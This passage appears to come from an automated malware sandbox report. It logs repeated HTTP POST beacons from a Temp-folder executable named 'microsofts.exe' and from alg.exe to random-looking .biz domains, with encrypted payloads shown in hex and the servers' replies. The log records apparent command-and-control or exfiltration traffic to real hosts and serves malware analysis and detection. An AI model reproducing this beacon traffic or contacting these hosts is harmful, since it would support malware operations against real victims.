                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=5d13570c70bdadfc0a49b3682ea1805c|8.46.123.33|1728547647|1728547647|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          4192.168.2.54971018.141.10.107807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:26.815845013 CEST358OUTPOST /acnwjlbaxboknfa HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:26.815876007 CEST778OUTData Raw: 52 be ff a1 ba e1 c6 f8 fe 02 00 00 8a 7a 8d d9 3d 56 a3 aa ca 1d a1 d9 2e 2e 92 98 9a bd 7b fe ab 8f 82 b6 36 91 11 ee 32 1a e7 5b 84 01 65 75 8b 40 ba 82 17 a5 f3 1e 4c 08 cc 37 c9 8e 5a ac 9b fc 9e e7 67 0c bf 29 b8 96 98 b8 24 20 6d 9d bb 59
                                                                                                                                                                                                                                                                                                          Data Ascii: Rz=V..{62[eu@L7Zg)$ mY<Z<IpJvyW~&*7<Y?dv)Zw9h D0]R W|L/6NJ!#iDHa3E7rGyLb"2IRB4wFkP1X9m
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.142940998 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:07:27 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=c58366d52b7d28f011baa997422ed616|8.46.123.33|1728547647|1728547647|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          5192.168.2.54971144.221.84.10580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:27.834861994 CEST358OUTPOST /dwqgybxwikykky HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:27.834960938 CEST828OUTData Raw: fd 13 10 09 42 5c 30 fe 30 03 00 00 46 40 a8 47 de 31 db 08 e6 52 c6 43 6c d1 19 1c 38 85 b2 76 30 32 f3 86 bf 70 e5 18 76 21 6a 10 08 6c be 67 3d 57 79 bd f5 64 19 67 a4 79 86 18 37 d6 9d 10 9f 91 3e 79 2e f1 3c 3c 9d f7 da 21 2e 55 b1 1f 9e f7
                                                                                                                                                                                                                                                                                                          Data Ascii: B\00F@G1RCl8v02pv!jlg=Wydgy7>y.<<!.Uq}j/=N}TD[-!b{|fru^/5^,*m]ztxKgc!Jj7g"MlYi^Wu4hL4S+oL:k\]o(
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.282351971 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:07:28 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=52cc2f51b8270fcf915ed9941f3459bb|8.46.123.33|1728547648|1728547648|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          6192.168.2.54971354.244.188.177807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.321480036 CEST356OUTPOST /mvgpsfdcrvitryo HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.321497917 CEST778OUTData Raw: 0c 22 db b2 5d 39 bc e0 fe 02 00 00 75 2b be de a1 85 a5 30 d8 3d 70 d6 df 07 36 99 6e e0 20 9a f9 b2 ce 70 1c 76 67 11 4b ba c0 29 ab 50 34 4d e0 50 a2 7b e4 3d ba 65 77 eb da d3 94 3c ff 95 65 28 20 1b dc 74 ec 6c 2d cb a7 8a 7c d2 35 9b 78 64
                                                                                                                                                                                                                                                                                                          Data Ascii: "]9u+0=p6n pvgK)P4MP{=ew<e( tl-|5xdx$c!>.!>F_T`rNpo@0fF;tJyR'g=ELcjHI]DgD8z"|w7Mujd*2`C
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.063055038 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:07:28 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=f300bac6f9c3406740cc32f31af58ffb|8.46.123.33|1728547648|1728547648|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          7192.168.2.549714172.234.222.14380576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.387974977 CEST347OUTPOST /rrba HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: przvgke.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.388010979 CEST828OUTData Raw: 47 0e c3 77 0e a0 98 9a 30 03 00 00 f7 90 12 20 62 73 4d 32 ce c2 90 2f 0c 63 b9 9e 22 5c 94 05 99 eb e2 8d db ab 0b d0 bf 51 88 86 d9 4f c2 7e c6 f0 f3 ce 02 5d 80 ef 09 4e ce 89 d3 8d 4d 2f bf 5c 51 cb f0 c5 b7 64 84 cd c8 92 f0 50 95 9e 10 72
                                                                                                                                                                                                                                                                                                          Data Ascii: Gw0 bsM2/c"\QO~]NM/\QdPr\nbCO3I(7@^x:NVv3mGBr{qAe*;pU>(P$R|Bh,!<{MX<ABr=.c_5xv%\p VOuKK


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          8192.168.2.549715172.234.222.14380576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.931571960 CEST353OUTPOST /ajvaopkagn HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: przvgke.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.931637049 CEST828OUTData Raw: a9 8b 62 57 36 cf 15 06 30 03 00 00 01 f0 54 41 51 2f 68 38 ec 18 8d df f0 f5 60 22 d3 52 08 98 49 b6 5e 73 15 fc 52 ea 98 0d b1 52 d4 c5 19 3b a0 56 da eb fc 9f f9 f6 e8 ff d4 9a bf ed ef e3 14 93 51 86 82 04 d2 84 0f 56 c2 43 70 43 9a e4 d9 12
                                                                                                                                                                                                                                                                                                          Data Ascii: bW60TAQ/h8`"RI^sRR;VQVCpCMCZqc`-uw^!q;D.dNM_$X[W0t%^(naJD*S96qgI)h9X`$,|3v+JhZS4du@#&


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          9192.168.2.54971644.221.84.105807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.393501043 CEST360OUTPOST /ojwgmwlrsgrxkodi HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.393501043 CEST778OUTData Raw: c9 60 bb 76 4c 65 3b 89 fe 02 00 00 78 f0 6e 27 4b b0 ec d6 75 ee b2 57 af a7 14 6e 98 90 f1 80 f9 54 d4 24 e9 68 e2 5a 09 8c b3 2d eb b0 60 e9 65 98 80 be 0e 77 bf 83 d0 d6 05 50 c1 70 1a 09 dc 7e 9c ce a2 21 5d 89 77 c7 5d 88 c1 60 5a 6a c2 f9
                                                                                                                                                                                                                                                                                                          Data Ascii: `vLe;xn'KuWnT$hZ-`ewPp~!]w]`ZjpWZ}5YW7rV<U/J"%u--!ZE/oAyQFXO0jS9^e9v/NhPj!KOPY24{7<^a*qD$
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.860227108 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:07:29 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=fd17a0a843249f8e16f516f1c06ae80b|8.46.123.33|1728547649|1728547649|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          10192.168.2.54971718.141.10.10780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.574687004 CEST355OUTPOST /xecqerkyvkn HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.575304985 CEST828OUTData Raw: 6e 5a 8b 48 92 e4 4c 2b 30 03 00 00 54 3a c4 d9 66 c9 54 49 5d 4a 6a 39 b2 3e 16 3e 28 60 21 0f ed 67 c3 a1 2d 3d db db 19 90 db 44 3d 32 34 1a 6e 46 67 3d 36 78 3a ee 6d 93 cf 4f 70 53 f3 17 c2 a4 8a c5 a1 a3 2c 79 4e bb c7 88 54 af 9e d8 21 d3
                                                                                                                                                                                                                                                                                                          Data Ascii: nZHL+0T:fTI]Jj9>>(`!g-=D=24nFg=6x:mOpS,yNT!"Hkc(;p'H6!{4F03ap"M:aDGmNExz{8sJ)5/Ur)G5QjpEWie)3lBFb
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.899318933 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:07:30 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=cbb900c6d08a3126e7a3d74dfa0f321d|8.46.123.33|1728547650|1728547650|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          11192.168.2.549718172.234.222.143807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.392519951 CEST356OUTPOST /ysrvxblocwefk HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: przvgke.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.392565012 CEST778OUTData Raw: d5 f2 41 13 4e b9 90 77 fe 02 00 00 bd 4f 3c d1 91 a9 e4 59 bf 4d 06 50 a5 ca 08 28 17 29 57 cd 04 d5 8c 5a 74 21 02 8e 51 22 14 52 8b 7a 92 59 39 9c 25 93 39 0d f5 f7 ed 91 42 ea 1a 63 37 0c 01 dc 0e 68 59 59 28 cb 3e 7c e8 a1 0c 6b 48 4b ef 8a
                                                                                                                                                                                                                                                                                                          Data Ascii: ANwO<YMP()WZt!Q"RzY9%9Bc7hYY(>|kHKdzXNEorV4SyrA8>EiBB<l,|L@20pXH=//m=QCxs`rT`q8HA\u9/G07y:%oVzqD]%HqTeOth


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          12192.168.2.54972082.112.184.19780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.959697962 CEST354OUTPOST /xkjanqfjaocn HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.959739923 CEST828OUTData Raw: fb 36 5e cb 87 38 ab 30 30 03 00 00 51 0d 94 fd f6 22 73 45 37 0d 78 fa d7 82 4a f3 b1 7a c5 dc 4f 25 32 39 2e 53 f0 29 2f bf f9 28 c1 13 76 87 52 34 1f 93 70 0a b0 41 c2 ac 02 b9 66 56 45 5d 53 a0 25 6b e2 ee 37 00 70 6e bc 25 ca 7e 24 bb b0 8f
                                                                                                                                                                                                                                                                                                          Data Ascii: 6^800Q"sE7xJzO%29.S)/(vR4pAfVE]S%k7pn%~$g(u_hjW]n#I%0ol_cTp3FI8$g\.I@pA @K3`uQ-rX,sfaG5h1s}'p


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          13192.168.2.549721172.234.222.143807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:31.021984100 CEST344OUTPOST /w HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: przvgke.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:31.022017002 CEST778OUTData Raw: 00 c2 72 f0 7a bd 7f 09 fe 02 00 00 20 58 60 02 8f 7b 95 d6 4e 18 36 42 7e 37 e0 a1 9a 3a a1 a3 1f b2 09 2d bd 69 3d 1e 7a 5d a2 f8 e2 f3 eb 1f 38 94 91 46 33 5e 09 a4 b9 c2 13 70 af cf 6c fa dd c6 c1 5c 7d e1 8e e8 72 37 9c eb 5f 76 3b d9 c0 d4
                                                                                                                                                                                                                                                                                                          Data Ascii: rz X`{N6B~7:-i=z]8F3^pl\}r7_v;NMV?-yn2RV)in.C9;kc{.T{,r\[.6Lz30-Cu"Gz<5/X;#$9}DgQ]pG<H!~ynws5B&


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          14192.168.2.54972418.141.10.107807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:31.687979937 CEST360OUTPOST /xylpjhgrvuhkfdao HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:31.688024044 CEST778OUTData Raw: a9 f3 bf 0c 03 b6 48 3f fe 02 00 00 b6 cf fb cb 01 5c 4e 25 88 9b 25 ae 20 71 76 70 23 69 e9 a9 8a 76 71 5b 32 b8 50 63 1e 0f 9a 80 98 3c a6 06 58 89 ec b8 d9 cf bd c1 36 a1 55 53 36 5e 09 3a e2 b2 eb f9 aa 21 cf 8b 7c 94 a1 8d 21 e1 4b 7b 0b 6d
                                                                                                                                                                                                                                                                                                          Data Ascii: H?\N%% qvp#ivq[2Pc<X6US6^:!|!K{mTi2,:rWxQ7H"dxM%9oUq_x8t"mj'%h[v!b.(@U0TOtUmF*CvNG
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:33.038400888 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:07:32 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=677bd58630d34250e089e5bce9cba3cf|8.46.123.33|1728547652|1728547652|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          15192.168.2.54973582.112.184.197807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:33.498348951 CEST345OUTPOST /mgu HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:33.498348951 CEST778OUTData Raw: 30 29 9e 51 75 03 54 9f fe 02 00 00 93 92 a6 aa b6 f9 1d 40 77 a9 3b b5 3e 35 78 44 f8 3e 0c 17 07 d0 bc 06 19 e1 7b 3b 89 3f 21 55 03 ed 06 3a 54 1f 40 54 81 7d bb ab 4c 23 ca 68 ed 3c 03 1f bf 6d 57 29 17 2c c8 69 3f 2e 50 6c 1f 20 d6 c1 51 84
                                                                                                                                                                                                                                                                                                          Data Ascii: 0)QuT@w;>5xD>{;?!U:T@T}L#h<mW),i?.Pl Q>Wcdw+G^j wn8@Y0}i\=T+VU6E5_d+')Q44'uL&gNJ&?/gl)T0s1*yHOE&T3!k7w1


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          16192.168.2.54977182.112.184.19780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:39.578125954 CEST355OUTPOST /pkabvaplwbiqx HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:39.578151941 CEST828OUTData Raw: 6c 39 52 fc cf d1 87 a5 30 03 00 00 bc 57 2c e9 3d 1f 74 57 85 f7 b2 6f de e8 15 13 ea dc 2a d8 ea ed ab 65 b0 80 a3 26 2d a1 a1 e2 84 77 7a 72 e4 4c b3 24 f5 53 56 68 6e 72 79 f7 78 bc 4d fc df 88 ff 22 5e 03 7f 73 a9 c1 37 8d ae 04 bd 55 e4 e3
                                                                                                                                                                                                                                                                                                          Data Ascii: l9R0W,=tWo*e&-wzrL$SVhnryxM"^s7U*uZsI,Of=NL"zGL.qimIT71p]Z :k#puH%%;wkNFi-E{z!K R7f1ibz~-


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          17192.168.2.54986982.112.184.197807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.912334919 CEST348OUTPOST /dmaeaf HTTP/1.1
